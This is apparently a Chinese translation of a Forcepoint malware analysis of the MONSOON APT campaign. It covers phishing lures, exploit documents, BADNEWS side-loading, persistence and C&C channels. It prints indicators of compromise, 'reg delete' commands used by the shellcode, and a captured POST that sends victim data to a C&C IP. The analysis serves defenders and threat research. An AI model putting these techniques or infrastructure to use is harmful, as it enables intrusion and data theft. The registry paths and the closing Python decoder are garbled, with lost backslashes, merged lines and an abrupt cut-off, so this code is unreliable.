*聲明：出于研究參考目的，本文為ForcePoint報告翻譯，文中涉及的觀點和立場不代表本網站觀點和立場。

　　Monsoon：（印度洋的）季風，季風雨，夏季季風

一、 概述

MONSOON APT的攻擊演變：根據Forcepoint研究人員收集的證據顯示， MONSOON組織已存在六年之久，其某些攻擊組件與2013年被Blue Coat發現的Operation Hangover相同。還可能與最近被Cymmetria發現的Patchwork和Kaspersky發現的Dropping Elephant，以及國內安天團隊發現的“白象的舞步”相關。本報告對MONSOON APT進行了深入的研究調查，囊括了之前未被發現的惡意軟件、受害者和攻擊架構。

MONSOON APT的攻擊目標：主要針對中國不同行業和南亞區域國家政府部門。MONSOON從2015年12月開始發起攻擊，截至2016年7月攻擊活動仍處于持續狀態。MONSOON通過向特定目標發送含有惡意附件的魚叉式郵件進行滲透攻擊，這些郵件主題內容多為政治和時事話題。

MONSOON APT使用的復雜惡意軟件：MONSOON使用了多個惡意軟件，包括 Unknown Logger Public鍵盤記錄器、TINYTYPHON、BADNEWS 和AutoIt Backdoor。其中，BADNEWS利用RSS訂閱、GitHub、論壇、博客和動態DNS主機向遠程C&C服務器進行通信，比較獨特，因此我們把其命名為BADNEWS。（此BADNEWS非感染Andriod平臺的BADNEWS）

誰是MONSOON APT的幕后攻擊者？基于對MONSOON的調查分析結合各項威脅指標，我們認為MONSOON和Operation Hangover存在高度相似，可能為來自于印度的APT攻擊。（Operation Hangover經調查分析被認為是由印度發起的APT攻擊 ）

二 、技術分析

1 初始調查動機

VirusTotal線索：VirusTotal（VT）智能分析功能經常被用來對新型可疑文件進行查詢對比，MONSOON的調查就起源于我們在VirusTotal上的查詢結果，其中被識別的一個RTF文檔讓我們更加堅定了繼續調查的決心。

CyberCrime Bill/BADNEWS線索：一個特殊文檔：“Cyber_Crime_bill.doc” 或“TelecommunicationsPolicy –APPROVED.DOCX”，VirusTotal的分析結果：低檢測率，低提交數，包括阿拉伯語、英語和中文語言，利用了已知的CVE-2015-1641漏洞。該文檔以政治主題為文件名，釋放的未知惡意軟件通過博客和RSS等方式與遠程C&C服務器進行通信，并被我們的調查人員命名為BADNEWS。

文檔作者線索：通過對原始RTF惡意文檔進行信息挖掘，發現了最后修改文檔的作者信息：

　　使用VT搜索，以下6個匹配文檔的作者信息被發現：

這些文檔的VT檢測結果、文件大小和相同的漏洞利用代碼讓我們更加肯定為同一攻擊者所為。VT對以上文檔的檢測結果中還包含了樣本文件名，其中一個為“china_report_EN_web_2016_A01.doc” ，其真實文檔為日本防衛研究所對中國國防政策的研究報告。

VT的檢測結果還顯示其中一個惡意文檔的提交IP為37.58.60.195，該IP提交過多個惡意軟件，另一個VT檢測結果顯示了其惡意文檔的分析結果。

傳播機制:另外，攻擊者通過比利時Your Mailing List Provider (YMLP)公司提供的在線文檔儲存服務t.ymlp50.com進行文件中轉，同時利用YMLP公司的郵件服務發送魚叉式釣魚郵件。

2 釣魚郵件誘餌文檔

為了吸引收件人注意，釣魚郵件的主題通常是與中國時事政治相關的主題，以下為其中一例：

就像以上的郵件樣例，攻擊通過YMLP的郵件服務偽造發件者，并嵌入惡意文檔下載鏈接。以下為一些釣魚郵件樣例的相關信息：

　　3 時事新聞誘餌

新聞網站:攻擊者通過建立運行虛假政治新聞網站chinastrat.com，利用網站下載功能提供惡意文檔傳播途徑，同時，通過大量郵件鏈接傳播，吸引用戶注冊并獲取相關密碼賬戶信息。

GooglePlus:攻擊者自2014年12月以來一直在操作運行一個Google Plus賬戶，該帳戶是用來發布虛假新聞網站chinastrat.com的相關鏈接。

FACEBOOK:攻擊者操作運行著一個FACEBOOK帳戶，這個帳戶也被用來發布虛假新聞網站chinastrat.com相關的鏈接。

TWITTER:自2014年12月起，攻擊者操作運行著一個twitter帳戶，其功能與Facebook和Google Plus一樣。

　　二、 惡意軟件分析

1 “武器化”文檔

漏洞利用:MONSOON攻擊的惡意軟件組合了幾種文檔型漏洞，攻擊者利用了某種惡意文檔生成器批量生成了這些貌似常規的“武器化”文檔。以下是幾個被利用的漏洞：

“BADNEWS武器化”文檔：BADNEWS惡意軟件被攻擊者以一個加密二進制大對象文件BLOB(binary large object) 捆綁在一個誘餌文檔中。漏洞CVE-2015-1641被用來釋放和植入BADNEWS惡意軟件，一旦漏洞利用代碼被觸發，其shellcode將把二進制大對象以一個加密的VBScript釋放到用戶的%temp%目錄:

這個加密的VBScript以.domx或.lgx格式結尾，最終，shellcode通過執行這個VBScript，從二進制大對象blob中提取并執行加密誘餌文檔，達到植入惡意軟件目的。后文將介紹BADNEWS更多詳細功能。以下為VBScript從二進制BLOB中提取誘餌文檔的編碼：

AutoIt 后門&Unknown Logger武器化文檔：大多數“武器化”文檔都會釋放并植入AutoIt 后門文件，以下是利用CVE-2014-6352漏洞植入AutoIt 后門的INF文件信息：

　　AutoIt后門木馬通過不同的偽裝程序運行：

　　“武器化”文檔同時也會釋放一個Unknown Logger記錄器(后文將作分析)。

TINYTYPHON（TYPHON: 信號器，喇叭）：MONSOON攻擊中的第三種惡意軟件是基于MyDoom類蠕蟲的小型后門程序，該后門程序通過抓取本地和映射磁盤文檔并上傳至遠程C&C服務器。在我們的分析中，利用了CVE-2012-0158的樣本文件“DPP_INDIA_2016.doc”曾釋放過該后門程序。樣本文檔中包含的shellcode在%temp%目錄下釋放svchost.exe程序，并嘗試通過命令關閉WORD恢復功能：

cmd.exe/c reg delete “HKCUSoftwareMicrosoftOffice .0WordResiliency”/F

cmd.exe /c reg delete”HKCUSoftwareMicrosoftOffice .0WordResiliency”/F

文檔釋放的svchost.exe程序用來執行一個base64加密的內置惡意組件“TINYTYPHON”(后文將作分析)。

2 潛在的SILVERLIGHT組件漏洞

提供“武器化”文檔的站點cnmilit.com和newsnstat.com，會把用戶重定向到文件lite.php，通過lite.php獲取惡意文檔。以下是lite.php的訪問示例:

Silverlight識別:據分析，攻擊者可能通過請求lite.php？name= true or false識別目標系統是否安裝有Silverlight軟件，然后利用Silverlight漏洞執行下一步滲透。以下為Silverlight識別代碼：

　　3 惡意軟件BADNEWS

BADNEWS能夠執行任意命令，截圖，自我更新，下載并執行文件以及列目錄操作。BADNEWS利用DLL旁加載（dll side-loading)以實現免殺，如果目標有價值，將會進行第二階段惡意軟件的部署滲透。

DLL Side-Loading：BADNEWS的DLL組件通常被旁加載注入到一個合法簽名java程序中。通過對一個樣本文檔的分析發現，樣本文檔釋放一個二進制大對象和一個加密VBScript腳本，在VBScript腳本提取誘餌文檔的同時，生成以下三個文件：

microscmgmt.exe、 MSVCR71.dll、 jli.dll

其中MicroScMgmt.exe就是旁加載注入合法進程javarmi.exe之后的惡意程序，它通過調用合法的MSVCR71.dll和惡意jli.dll達到執行惡意軟件目的。MicroScMgmt.exe一旦執行，它將加載jli.dll，最終調用DLL組件中的jli_wildcardexpandclasspath_0出口，此時，BADNEWS將執行自身惡意程序。這種惡意軟件的旁加載是一種隱形和免殺技術，該惡意軟件將產生兩個線程，一個執行鍵記錄，另一個獲取本地和映射硬盤驅動器文檔。

持久駐留：BADNEWS通過在注冊表中生成以下注冊表項達到在受害者系統的持久駐留：

HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun

C&C通信 ：BADNEWS中包含有獲取遠程C&C服務器指令的固定通信代碼和方式，這些方式包括RSS訂閱、GitHub，論壇、博客和動態DNS主機。在我們的分析樣本中，發現了其中一些殘存和停用的通信方式：

BADNEWS中包含有獲取遠程C&C服務器指令的固定通信代碼和方式，這些方式包括RSS訂閱、GitHub，論壇、博客和動態DNS主機。在我們的分析樣本中，發現了其中一些殘存和停用的通信方式：

hxxp://feeds.rapidfeeds.com/81913/

hxxps://raw.githubusercontent.com/azeemkhan89/cartoon/master/cart.xml hxxp://www.webrss.com/createfeed.phpfeedid=47448 hxxp://www.webrss.com/createfeed.phpfeedid=47449

hxxp://www.chinasmack.com/2016/digest/chinese-tourist-bit-by-snake-in-thailand.html

hxxp://www.travelhoneymoon.wordpress.com/2016/03/30/tips-to-how-to-feel-happy

hxxp://overthemontains.weebly.com/trekking-lovers

hxxp://tariqj.crabdance.com/tesla/ghsnls.php

hxxp://javedtar.chickenkiller.com/tesla/ghsnls.php

hxxp://asatar.ignorelist.com/tesla/ghsnls.php

前7個C&C通信方式都是“blog”或“feed”方式，最后3個動態DNS主機方式為前7個信道的備份通信方式，其中請求的文件名“ghsnls.php”似乎都是相同的，但上一級目錄名根據不同的攻擊活動和惡意軟件，經常發生變化，如：

tesla、Tussmal、Mussma、quantum、yumhong

惡意軟件會從Blog或Feed方式網頁中搜索并提取“ {{”內的字段以獲取C&C信息。以下為一個Github樣例：

另一個例子是來自網站chinasmack.com中名為“Zubaid12″的用戶評論：

　　以及來自論壇forum.china.org.cn的評論：

“{{”之后的內容是以相同方式加密的C&C地址信息，但現在論壇上這篇文章已經看不見了，因為作者已經把它設置為白色文本背景。

C&C運行機制：BADNEWS與C&C服務器之間建立連接之后，將會向C&C服務器發送受害者系統相關信息，同時為受害者系統在%temp%目錄生成一個帶有獨特編號的文件：“%temp%T89.dat“

POST http://85.25.79.230/tesla/ghsnls.php HTTP/1.1

Accept: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

User-Agent:UserAgent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.1(KHTML,like Gecko)Chrome/21.0.1180.75Safari/537.1

Host: 85.25.79.230

Content-Length: 249

Cache-Control: no-cache

esmqss=**redacted**&btcbumegy=**redacted**&pxckhj=**redacted**&xyvqq=**redacted**

C&C服務器的所有通信數據都是通過把每字節循環右移3bit，然后以023進行異或操作，之后再以16進制內容進行Base64加密。以下是對數據進行解密的一個Python腳本：badnews_decoder.py

importsys,getopt importbase64

# Rotate left: 0b1001 -->0b0011

rol = lambda val, r_bits, max_bits:

(val <

((val &(2**max_bits-1)) >>(max_bits-(r_bits%max_bits)))

# Rotate right: 0b1001 -->0b1100

ror = lambda val, r_bits, max_bits:

((val &(2**max_bits-1)) >>r_bits%max_bits) |

(val <<(max_bits-(r_bits%max_bits)) &(2**max_bits-1))

if len(sys.argv) !=2:

exit("Usage: badnews_decoder.py")

data=sys.argv[1]

# Print original data input print"[1]Original: " +data

data= base64.b64decode(data)

# Print the base64 decoded hex bytestring print "[2]Base64dec: " +data

# Decode the hex bytes into to binarydata data =data.decode("hex")

decdata=''

# XOReach byte by 0x23 and rotate left by 3bits for x inrange(len(data)):

c =ord(data[x]) c ^=0x23

c =rol(c, 3, 8) decdata +=chr(c)

# Null terminate decdata +='